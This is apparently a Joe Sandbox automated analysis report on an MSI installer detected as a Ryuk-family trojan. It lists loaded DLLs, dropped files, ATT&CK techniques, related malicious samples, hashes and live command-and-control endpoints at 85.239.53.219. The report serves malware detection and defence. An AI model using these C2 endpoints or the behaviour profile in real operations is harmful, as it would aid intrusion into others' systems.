Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: samcli.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: logoncli.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: apphelp.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: aclayers.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: mpr.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc_os.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: msi.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: netapi32.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: samcli.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: logoncli.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: netapi32.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: samcli.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: logoncli.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: msimg32.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: winhttp.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: webio.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: mswsock.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: winnsi.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: dnsapi.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: rasadhlp.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: fwpuclnt.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: schannel.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: mskeyprotect.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: ntasn1.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: ncrypt.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: ncryptsslp.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: dpapi.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: avp.msiStatic file information: File size 1427968 > 1048576
Source: Binary string: C:\JobRelease\win\Release\custact\x86\AICustAct.pdb source: avp.msi, MSI1DEC.tmp.1.dr, MSI1C29.tmp.0.dr, MSI1C9A.tmp.0.dr, MSI1E99.tmp.1.dr, MSI1B7B.tmp.0.dr, MSI1C09.tmp.0.dr, MSI1C6A.tmp.0.dr, 651cf2.msi.1.dr, MSI1C4A.tmp.0.dr
Source: Binary string: C:\JobRelease\win\Release\custact\x86\AICustAct.pdbn source: avp.msi, MSI1DEC.tmp.1.dr, MSI1C29.tmp.0.dr, MSI1C9A.tmp.0.dr, MSI1E99.tmp.1.dr, MSI1B7B.tmp.0.dr, MSI1C09.tmp.0.dr, MSI1C6A.tmp.0.dr, 651cf2.msi.1.dr, MSI1C4A.tmp.0.dr
Source: forcedelctl.dll.1.drStatic PE information: real checksum: 0x8629a should be: 0xf0c20
Source: C:\Windows\System32\msiexec.exeFile created: C:\Users\user\AppData\Local\Temp\MSI1C9A.tmpJump to dropped file
Source: C:\Windows\System32\msiexec.exeFile created: C:\Users\user\AppData\Local\Temp\MSI1C29.tmpJump to dropped file
Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI1DEC.tmpJump to dropped file
Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI1E99.tmpJump to dropped file
Source: C:\Windows\System32\msiexec.exeFile created: C:\Users\user\AppData\Local\Temp\MSI1C09.tmpJump to dropped file
Source: C:\Windows\System32\msiexec.exeFile created: C:\Users\user\AppData\Local\sharepoint\forcedelctl.dllJump to dropped file
Source: C:\Windows\System32\msiexec.exeFile created: C:\Users\user\AppData\Local\Temp\MSI1C4A.tmpJump to dropped file
Source: C:\Windows\System32\msiexec.exeFile created: C:\Users\user\AppData\Local\Temp\MSI1B7B.tmpJump to dropped file
Source: C:\Windows\System32\msiexec.exeFile created: C:\Users\user\AppData\Local\Temp\MSI1C6A.tmpJump to dropped file
Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI1DEC.tmpJump to dropped file
Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI1E99.tmpJump to dropped file
Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\MSI1C9A.tmpJump to dropped file
Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\MSI1C29.tmpJump to dropped file
Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Windows\Installer\MSI1DEC.tmpJump to dropped file
Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Windows\Installer\MSI1E99.tmpJump to dropped file
Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\MSI1C09.tmpJump to dropped file
Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\sharepoint\forcedelctl.dllJump to dropped file
Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\MSI1C4A.tmpJump to dropped file
Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\MSI1B7B.tmpJump to dropped file
Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\MSI1C6A.tmpJump to dropped file
Source: C:\Windows\SysWOW64\msiexec.exe TID: 3804Thread sleep time: -210000s >= -30000sJump to behavior
Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
Source: C:\Windows\System32\msiexec.exeProcess information queried: ProcessInformationJump to behavior
Source: C:\Windows\System32\msiexec.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\msiexec.exeQueries volume information: C:\ VolumeInformationJump to behavior
ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity InformationAcquire Infrastructure1
Replication Through Removable Media
Windows Management Instrumentation1
DLL Side-Loading
1
Process Injection
21
Masquerading
OS Credential Dumping1
Security Software Discovery
Remote ServicesData from Local System1
Encrypted Channel
Exfiltration Over Other Network MediumAbuse Accessibility Features
CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts1
DLL Side-Loading
1
Virtualization/Sandbox Evasion
LSASS Memory1
Virtualization/Sandbox Evasion
Remote Desktop ProtocolData from Removable Media1
Ingress Tool Transfer
Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)1
Process Injection
Security Account Manager1
Process Discovery
SMB/Windows Admin SharesData from Network Shared Drive3
Non-Application Layer Protocol
Automated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
DLL Side-Loading
NTDS11
Peripheral Device Discovery
Distributed Component Object ModelInput Capture14
Application Layer Protocol
Traffic DuplicationData Destruction
Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
File Deletion
LSA Secrets1
System Network Configuration Discovery
SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC ScriptsSteganographyCached Domain Credentials12
System Information Discovery
VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand
SourceDetectionScannerLabelLink
avp.msi16%ReversingLabsWin32.Trojan.Ryuk
avp.msi23%VirustotalBrowse
SourceDetectionScannerLabelLink
C:\Users\user\AppData\Local\sharepoint\forcedelctl.dll100%Joe Sandbox ML
C:\Users\user\AppData\Local\Temp\MSI1B7B.tmp0%ReversingLabs
C:\Users\user\AppData\Local\Temp\MSI1B7B.tmp0%VirustotalBrowse
C:\Users\user\AppData\Local\Temp\MSI1C09.tmp0%ReversingLabs
C:\Users\user\AppData\Local\Temp\MSI1C09.tmp0%VirustotalBrowse
C:\Users\user\AppData\Local\Temp\MSI1C29.tmp0%ReversingLabs
C:\Users\user\AppData\Local\Temp\MSI1C29.tmp0%VirustotalBrowse
C:\Users\user\AppData\Local\Temp\MSI1C4A.tmp0%ReversingLabs
C:\Users\user\AppData\Local\Temp\MSI1C4A.tmp0%VirustotalBrowse
C:\Users\user\AppData\Local\Temp\MSI1C6A.tmp0%ReversingLabs
C:\Users\user\AppData\Local\Temp\MSI1C6A.tmp0%VirustotalBrowse
C:\Users\user\AppData\Local\Temp\MSI1C9A.tmp0%ReversingLabs
C:\Users\user\AppData\Local\Temp\MSI1C9A.tmp0%VirustotalBrowse
C:\Users\user\AppData\Local\sharepoint\forcedelctl.dll24%ReversingLabsWin32.Trojan.Ryuk
C:\Users\user\AppData\Local\sharepoint\forcedelctl.dll49%VirustotalBrowse
C:\Windows\Installer\MSI1DEC.tmp0%ReversingLabs
C:\Windows\Installer\MSI1DEC.tmp0%VirustotalBrowse
C:\Windows\Installer\MSI1E99.tmp0%ReversingLabs
C:\Windows\Installer\MSI1E99.tmp0%VirustotalBrowse
No Antivirus matches
No Antivirus matches
SourceDetectionScannerLabelLink
http://85.239.53.219/api/gateway10%VirustotalBrowse
NameIPActiveMaliciousAntivirus DetectionReputation
api.ipify.org
104.26.12.205
truefalse
    high
    NameMaliciousAntivirus DetectionReputation
    https://api.ipify.org/false
      high
      http://85.239.53.219/api/gatewaytrueunknown
      http://85.239.53.219/api/7f841ea3-c875-6dfd-678b-29dc794014c1/taskstrue
        unknown
        NameSourceMaliciousAntivirus DetectionReputation
        https://www.advancedinstaller.comavp.msi, MSI1DEC.tmp.1.dr, MSI1C29.tmp.0.dr, MSI1C9A.tmp.0.dr, MSI1E99.tmp.1.dr, MSI1B7B.tmp.0.dr, MSI1C09.tmp.0.dr, MSI1C6A.tmp.0.dr, 651cf2.msi.1.dr, MSI1C4A.tmp.0.drfalse
          high
          https://www.thawte.com/cps0/avp.msi, MSI1DEC.tmp.1.dr, MSI1C29.tmp.0.dr, MSI1C9A.tmp.0.dr, MSI1E99.tmp.1.dr, MSI1B7B.tmp.0.dr, MSI1C09.tmp.0.dr, MSI1C6A.tmp.0.dr, 651cf2.msi.1.dr, MSI1C4A.tmp.0.drfalse
            high
            https://www.thawte.com/repository0Wavp.msi, MSI1DEC.tmp.1.dr, MSI1C29.tmp.0.dr, MSI1C9A.tmp.0.dr, MSI1E99.tmp.1.dr, MSI1B7B.tmp.0.dr, MSI1C09.tmp.0.dr, MSI1C6A.tmp.0.dr, 651cf2.msi.1.dr, MSI1C4A.tmp.0.drfalse
              high
              • No. of IPs < 25%
              • 25% < No. of IPs < 50%
              • 50% < No. of IPs < 75%
              • 75% < No. of IPs
              IPDomainCountryFlagASNASN NameMalicious
              104.26.12.205
              api.ipify.orgUnited States
              13335CLOUDFLARENETUSfalse
              85.239.53.219
              unknownRussian Federation
              134121RAINBOW-HKRainbownetworklimitedHKtrue
              Joe Sandbox version:40.0.0 Tourmaline
              Analysis ID:1428527
              Start date and time:2024-04-19 06:13:53 +02:00
              Joe Sandbox product:CloudBasic
              Overall analysis duration:0h 4m 38s
              Hypervisor based Inspection enabled:false
              Report type:full
              Cookbook file name:default.jbs
              Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
              Number of analysed new started processes analysed:8
              Number of new started drivers analysed:0
              Number of existing processes analysed:0
              Number of existing drivers analysed:0
              Number of injected processes analysed:0
              Technologies:
              • HCA enabled
              • EGA enabled
              • AMSI enabled
              Analysis Mode:default
              Analysis stop reason:Timeout
              Sample name:avp.msi
              Detection:MAL
              Classification:mal80.winMSI@6/19@1/2
              EGA Information:Failed
              HCA Information:
              • Successful, ratio: 100%
              • Number of executed functions: 0
              • Number of non-executed functions: 0
              Cookbook Comments:
              • Found application associated with file extension: .msi
              • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
              • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
              • Not all processes where analyzed, report is missing behavior information
              TimeTypeDescription
              06:14:48API Interceptor8x Sleep call for process: msiexec.exe modified
              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
              104.26.12.205Sky-Beta.exeGet hashmaliciousStealitBrowse
              • api.ipify.org/?format=json
              SecuriteInfo.com.Backdoor.Win32.Agent.myuuxz.13708.17224.exeGet hashmaliciousBunny LoaderBrowse
              • api.ipify.org/
              lods.cmdGet hashmaliciousRemcosBrowse
              • api.ipify.org/
              85.239.53.219payload.jsGet hashmaliciousUnknownBrowse
              • 85.239.53.219/api/66481073-52ba-f6d0-2fac-44be76e24f05/tasks
              payload.jsGet hashmaliciousUnknownBrowse
              • 85.239.53.219/api/66ee6fd3-f726-fca9-a3d0-e9873437a901/tasks
              forcedelctl.dllGet hashmaliciousUnknownBrowse
              • 85.239.53.219/api/1cb8fa8e-3d13-f37e-1658-4ab010ca2563/tasks
              Doc_m42_81h118103-88o62135w8623-1999q9.jsGet hashmaliciousUnknownBrowse
              • 85.239.53.219/api/de72fb63-83c4-9ec1-f109-76a72acd5289/tasks
              forcedelctl.dllGet hashmaliciousUnknownBrowse
              • 85.239.53.219/api/ffc6f156-1933-1a3c-af30-7a79546ff511/tasks
              MenuEx.dllGet hashmaliciousUnknownBrowse
              • 85.239.53.219/api/488198d9-c268-6844-efbc-720e2aee69aa/tasks
              MenuEx.dllGet hashmaliciousUnknownBrowse
              • 85.239.53.219/api/488198d9-c268-6844-efbc-720e2aee69aa/tasks
              sharepoint.msiGet hashmaliciousUnknownBrowse
              • 85.239.53.219/api/488198d9-c268-6844-efbc-720e2aee69aa/tasks
              Incident_Report_Harassment.docGet hashmaliciousUnknownBrowse
              • 85.239.53.219/api/eae0b293-9be2-4432-c40e-c9c6b1b9d7a1/tasks
              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
              api.ipify.orghttps://cvn7.sa.com/invoice.html?app=Get hashmaliciousHTMLPhisherBrowse
              • 172.67.74.152
              TiKj3IVDj4.exeGet hashmaliciousMint StealerBrowse
              • 104.26.13.205
              TiKj3IVDj4.exeGet hashmaliciousMint StealerBrowse
              • 104.26.12.205
              KZWCMNWmmqi9lvI.exeGet hashmaliciousAgentTeslaBrowse
              • 104.26.12.205
              Payment.exeGet hashmaliciousAgentTesla, PureLog Stealer, RedLineBrowse
              • 104.26.13.205
              DOCUMENTS OF OWNERSHIP AND PAYMENT REQUIREMENTS.exeGet hashmaliciousAgentTesla, DarkTortillaBrowse
              • 104.26.12.205
              Gcerti Quote.exeGet hashmaliciousAgentTeslaBrowse
              • 104.26.12.205
              Arba Outstanding Statement.exeGet hashmaliciousAgentTesla, PureLog Stealer, RedLineBrowse
              • 104.26.12.205
              Shipping Dcuments_CI PKL_HL_.vbsGet hashmaliciousAgentTesla, GuLoaderBrowse
              • 172.67.74.152
              hesaphareketi-01.pdf.SCR.exeGet hashmaliciousAgentTeslaBrowse
              • 104.26.12.205
              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
              CLOUDFLARENETUShttps://librospy.com/Get hashmaliciousUnknownBrowse
              • 172.67.219.113
              13w4NM6mPa.exeGet hashmaliciousLummaCBrowse
              • 172.67.153.60
              SecuriteInfo.com.Win32.Evo-gen.15237.11182.exeGet hashmaliciousAmadey, RedLine, RisePro StealerBrowse
              • 104.26.5.15
              SecuriteInfo.com.W32.AutoIt.YE.gen.Eldorado.12126.13851.exeGet hashmaliciousFormBookBrowse
              • 23.227.38.74
              DTLite1200-2126.exeGet hashmaliciousUnknownBrowse
              • 104.18.38.233
              https://cvn7.sa.com/invoice.html?app=Get hashmaliciousHTMLPhisherBrowse
              • 172.67.74.152
              SecuriteInfo.com.Program.Unwanted.5412.9308.3353.exeGet hashmaliciousPureLog StealerBrowse
              • 104.17.24.14
              https://appddd08.z19.web.core.windows.net/Win0security-helpline07/index.html?ph0n=1-844-492-0415Get hashmaliciousTechSupportScamBrowse
              • 104.21.53.38
              https://6a5ff6af4b0fe3e6f0bd452927dfb55b352fdd2d1bab6d1e7de2b641e2.pages.dev/Get hashmaliciousHTMLPhisherBrowse
              • 172.66.46.227
              SecuriteInfo.com.Win64.Evo-gen.32634.31069.exeGet hashmaliciousLummaC, Glupteba, LummaC Stealer, Mars Stealer, PureLog Stealer, RedLine, RisePro StealerBrowse
              • 104.21.91.214
              RAINBOW-HKRainbownetworklimitedHKpayload.jsGet hashmaliciousUnknownBrowse
              • 85.239.53.219
              payload.jsGet hashmaliciousUnknownBrowse
              • 85.239.53.219
              YHbakNEfOJ.elfGet hashmaliciousGafgyt, MiraiBrowse
              • 85.239.55.70
              8hQCf2Y8Ra.elfGet hashmaliciousGafgyt, MiraiBrowse
              • 85.239.55.70
              nD1z4HgXaM.elfGet hashmaliciousGafgyt, MiraiBrowse
              • 85.239.55.70
              wUxE90cdjt.elfGet hashmaliciousGafgyt, MiraiBrowse
              • 85.239.55.70
              tKoNPvwS4w.elfGet hashmaliciousGafgyt, MiraiBrowse
              • 85.239.55.70
              LBf1XUIrDJ.elfGet hashmaliciousGafgyt, MiraiBrowse
              • 85.239.55.70
              8KafgGEWGu.elfGet hashmaliciousGafgyt, MiraiBrowse
              • 85.239.55.70
              2ASJJEjB7U.elfGet hashmaliciousGafgyt, MiraiBrowse
              • 85.239.55.70
              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
              a0e9f5d64349fb13191bc781f81f42e113w4NM6mPa.exeGet hashmaliciousLummaCBrowse
              • 104.26.12.205
              SecuriteInfo.com.Win32.Evo-gen.15237.11182.exeGet hashmaliciousAmadey, RedLine, RisePro StealerBrowse
              • 104.26.12.205
              SecuriteInfo.com.Trojan.KillProc2.23108.29569.31585.exeGet hashmaliciousUnknownBrowse
              • 104.26.12.205
              UeW2b6mU6Z.exeGet hashmaliciousAmadey, RisePro StealerBrowse
              • 104.26.12.205
              0001.docGet hashmaliciousDynamerBrowse
              • 104.26.12.205
              XY2I8rWLkM.exeGet hashmaliciousRemcos, DBatLoaderBrowse
              • 104.26.12.205
              PO_983888123.xlsGet hashmaliciousUnknownBrowse
              • 104.26.12.205
              8Sb3Ng0nF3.exeGet hashmaliciousLummaCBrowse
              • 104.26.12.205
              SecuriteInfo.com.Riskware.2144FlashPlayer.20362.15838.exeGet hashmaliciousUnknownBrowse
              • 104.26.12.205
              Gantt_Excel_Pro_Daily_Free1.xlsmGet hashmaliciousUnknownBrowse
              • 104.26.12.205
              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
              C:\Users\user\AppData\Local\Temp\MSI1B7B.tmpCheater Pro 1.6.0.msiGet hashmaliciousUnknownBrowse
                Cheat Lab 2.7.2.msiGet hashmaliciousUnknownBrowse
                  payload.jsGet hashmaliciousUnknownBrowse
                    payload.jsGet hashmaliciousUnknownBrowse
                      Doc_m42_81h118103-88o62135w8623-1999q9.jsGet hashmaliciousUnknownBrowse
                        sharepoint.msiGet hashmaliciousUnknownBrowse
                          slack.msiGet hashmaliciousBazar LoaderBrowse
                            out_bdrts.jsGet hashmaliciousBazar LoaderBrowse
                              font.msiGet hashmaliciousBazar LoaderBrowse
                                C:\Users\user\AppData\Local\Temp\MSI1C09.tmpCheater Pro 1.6.0.msiGet hashmaliciousUnknownBrowse
                                  Cheat Lab 2.7.2.msiGet hashmaliciousUnknownBrowse
                                    payload.jsGet hashmaliciousUnknownBrowse
                                      payload.jsGet hashmaliciousUnknownBrowse
                                        Doc_m42_81h118103-88o62135w8623-1999q9.jsGet hashmaliciousUnknownBrowse
                                          sharepoint.msiGet hashmaliciousUnknownBrowse
                                            slack.msiGet hashmaliciousBazar LoaderBrowse
                                              out_bdrts.jsGet hashmaliciousBazar LoaderBrowse
                                                font.msiGet hashmaliciousBazar LoaderBrowse
                                                  Process:C:\Windows\System32\msiexec.exe
                                                  File Type:data
                                                  Category:modified
                                                  Size (bytes):1329
                                                  Entropy (8bit):5.6919646470792475
                                                  Encrypted:false
                                                  SSDEEP:24:AgCsMDlI6kcDd6kzFHzM+LzyLqzHpUVb1g7fKFPRmfiVfizDhiS31Fb1c:AOMqK8khHIkWLqtsWuPRaiVizD8SlDc
                                                  MD5:563C8AFCE41AFA9D4200907EECA30FBC
                                                  SHA1:2DD95F06316DC666C047845CD76DCB855457F842
                                                  SHA-256:1530CC5AD9CA0CE11736DCE4DB406848C2691E4D4621A376AD39F83B0FAD10E1
                                                  SHA-512:C5A6544FEEBA9BD480008DE6EB58629211D9FF7984CC0058E7A8CB8E26DDA35E5E2FE6B9D70785FC99D9B061CA2F05E0339F7762D9BF281935424432E390E465
                                                  Malicious:false
                                                  Reputation:low
                                                  Preview:...@IXOS.@.....@.1.X.@.....@.....@.....@.....@.....@......&.{52EF198D-0C6C-406A-803F-F86D93DD7930}..GeoTdata..avp.msi.@.....@.....@.....@........&.{117CFEB2-6376-4FA5-ACE4-CD1494F2E3DD}.....@.....@.....@.....@.......@.....@.....@.......@......GeoTdata......Rollback..Rolling back action:....RollbackCleanup..Removing backup files..File: [1]....ProcessComponents..Updating component registration..&.{B48CC27C-9823-4256-8235-834BFD2D0DBB}&.{52EF198D-0C6C-406A-803F-F86D93DD7930}.@......&.{4A323D5F-6D73-4C26-8E39-BE8928DA13EB}&.{52EF198D-0C6C-406A-803F-F86D93DD7930}.@......&.{698ED6C9-206D-4BB6-BF3D-8CF082F29629}&.{52EF198D-0C6C-406A-803F-F86D93DD7930}.@......&.{166D45B5-D23D-467B-BBDE-9EF5A3B91CB0}&.{52EF198D-0C6C-406A-803F-F86D93DD7930}.@........CreateFolders..Creating folders..Folder: [1]#.5.C:\Users\user\AppData\Roaming\Since Flawer\GeoTdata\.@....#.(.C:\Users\user\AppData\Local\New Folder\.@........InstallFiles..Copying new files&.File: [1], Directory: [9], Size: [6]..(.C:\Users\user
                                                  Process:C:\Windows\System32\msiexec.exe
                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                  Category:dropped
                                                  Size (bytes):446944
                                                  Entropy (8bit):6.403916470886214
                                                  Encrypted:false
                                                  SSDEEP:6144:5x0A4eCDsgvSd7ftYx5fnLHT7ybjfgaUFfQiAOuv2IaZeB+:5x0ECIgYOx5fnL/tYi8OBZr
                                                  MD5:475D20C0EA477A35660E3F67ECF0A1DF
                                                  SHA1:67340739F51E1134AE8F0FFC5AE9DD710E8E3A08
                                                  SHA-256:426E6CF199A8268E8A7763EC3A4DD7ADD982B28C51D89EBEA90CA792CBAE14DD
                                                  SHA-512:99525AAAB2AB608134B5D66B5313E7FC3C2E2877395C5C171897D7A6C66EFB26B606DE1A4CB01118C2738EA4B6542E4EB4983E631231B3F340BF85E509A9589E
                                                  Malicious:true
                                                  Antivirus:
                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                  • Antivirus: Virustotal, Detection: 0%, Browse
                                                  Joe Sandbox View:
                                                  • Filename: Cheater Pro 1.6.0.msi, Detection: malicious, Browse
                                                  • Filename: Cheat Lab 2.7.2.msi, Detection: malicious, Browse
                                                  • Filename: payload.js, Detection: malicious, Browse
                                                  • Filename: payload.js, Detection: malicious, Browse
                                                  • Filename: Doc_m42_81h118103-88o62135w8623-1999q9.js, Detection: malicious, Browse
                                                  • Filename: sharepoint.msi, Detection: malicious, Browse
                                                  • Filename: slack.msi, Detection: malicious, Browse
                                                  • Filename: out_bdrts.js, Detection: malicious, Browse
                                                  • Filename: font.msi, Detection: malicious, Browse
                                                  Reputation:moderate, very likely benign file
